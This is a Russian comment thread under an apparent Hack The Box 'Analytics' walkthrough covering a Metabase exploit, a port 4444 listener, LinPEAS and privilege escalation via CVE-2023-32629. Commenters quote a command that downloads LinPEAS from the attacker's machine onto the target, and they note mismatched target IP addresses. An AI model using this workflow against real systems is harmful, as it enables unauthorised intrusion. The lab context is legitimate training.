
Комментарии 14
Это Metabase
А если бы не было этого сервиса на машине, то что?
то не было бы и самой машины)
в данном случае первичный доступ только через этот сервис
Спасибо за ответ. Я спросил без подвоха. Я обычный обыватель, не IT и спрашиваю, чтобы уяснить. Это было задание на проникновение с определенным сервисом на борту? Не просто на любую произвольную Линукс систему? Правильно?
все верно
Не сочтите за занудство, я не настоящий сварщик. Несколько раз перечитываю Вашу статью и не въезжаю. Уточните пожалуйста, что я неправильно понимаю.
Целевая, подопытная машина
10.10.11.234 которую Вы сканируете на предмет открытых портов с машины(kali) 10.10.16.68 и находите на ней вебсервисMetabase, для которого есть эксплоит.Запускаете эксплойт где? На Вашей "хакерской" машине
kali-10.10.16.68 через порт 4444 для доступа к целевой машине? Тогда почему на картинке Вы к другой машине 10.10.11.233 обращаетесь? А если этот порт 4444 закрыт вообще? Или я вообще не правильно все понимаю?Далее, я вообще потерялся. "Для дальнейшего продвижения нам нужно закинуть на машину LinPEAS для обнаружения способов повышения привилегий. Поэтому запустим на нашей ОС
python3 http.serverи черезwgetскачаем нужный нам скрипт:" На какую машину закинуть LinPEAS? На своюkaliили машину жертву? Поэтому, где запускаем http.server? Наkali? и качаем через wget http://10.10.16.68/linpeas.sh, но ведь kali и есть 10.10.16.68 Сами себе качаем что-ли? Вы бы как-то отредактировали бы пост, чтобы не было разночтений и непонимания, что есть что(но с поправкой, что я неправильно все понимаю)Отработав, скрипт найдет креды для подключения по SSH: Что такое креды?
Далее есть еще вопросы, но пожалуйста сначала эти разъясните.
да был небольшой недочет. Мы обращаемся к машине по адресу 10.10.11.233! Чтобы отпали ваши вопросы, почитайте как работает wget. И зачем нам запускать LinPEAS на своей машине? Зачем нам повышать привилегии на своей же машине? Ознакомьтесь с базовыми понятиями и работой сетевых технологий
Базовые понятия я знаю и как wget работает тоже. Не понятно Ваше описание. И что такое креды? Вы же для людей пишите, а не на отъебись. Вы свой сленг знаете, а читатель нет. Почему нельзя общепринятыми терминами изъясняться?
И зачем нам запускать LinPEAS на своей машине? Зачем нам повышать привилегии на своей же машине?
Вот я и отмечаю. У Вас это не явно указано. Отсюда каша.
Для дальнейшего продвижения нам нужно закинуть на машину LinPEAS для обнаружения способов повышения привилегий. Поэтому запустим на нашей ОС
python3 http.serverи черезwgetскачаем нужный нам скрипт:"
Наша ОС, это наша машина или машина жертва? Ведь наша же, kali которая.
и сразу, в этом же предложении "И скачаем скрипт" Но скрипт нужен на жертве же? A как мы уже на жертве можем запускать wget? Мы уже на ней? Как? Когда? Где это у Вас явно отмечено? Как мы запускаем wget http://10.10.16.68/linpeas.sh на жертве, если мы еще к ней не подключены по ssh?
И Вы не ответили про порт 4444. Он на жертве открыт? или что? А если закрыт, то как на жертву пробросить эксплойт?
Да,не можем не согласиться,что статья предназначена для Junior специалиста в области информационных технологий и больше ориентирована на читателя, обладающего некоторой терминологией и понятиями в области информационной безопасности, так как предложенная тренировочная площадка отражает элементы отработки определённых шагов Cyber Kill Chain.В связи с тем,что существует достаточно большое количество ресурсов в сети Интернет с описанием данных терминов, они были опущены и оставлены заинтересованному читателю для самостоятельного изучения необъятной области информационных технологий и безопасности?
Здесь же будет находится флаг user.txt
Наверное файл, а не флаг? И файл будет(что делатЬ) находитЬся.
Или Вы имели в виду, "Здесь же находится файл...", без слова будет?
И что? Что это за файл такой user.txt? Зачем вы его упомянули? Если он нужен зачем-то, то объясните, зачем?
Данная статья описывает прохождение тренировочной площадки, где существует своя терминология.Если Вас заинтересовало данное направление, предлагаем самостоятельно отработать шаги из данного примера и попробовать взломать другие машины,на которые нет разборов.Этот подход поможет Вам прокачать свои навыки в области наступательной безопасности.
Что если в машине жертве подключение в ssh не по паролю, а по ключу?
Судя по Вашим формальным ответам, в стиле "Иди учи матчасть" и не ответам, на конкретные вопросы, у меня создается впечатление, что Вы сами не понимаете, о чем ведете речь.
Сдается мне, что Вы просто передрали в сети чей-то труд, как попугай, без понимания, свалили в кучу его картинки и не можете внятно объяснить весь процесс. Поэтому даже не заметили, что сканировали порты у одной машины, а эксплойт пытаетесь внедрить на другую. Возможно, что Вы только перевели все на русский язык, а в нюансах не разобрались
и ничего не понимаете. Но беретесь учить других.
HTB Analytics. Повышаем привилегии с помощью CVE-2023-32629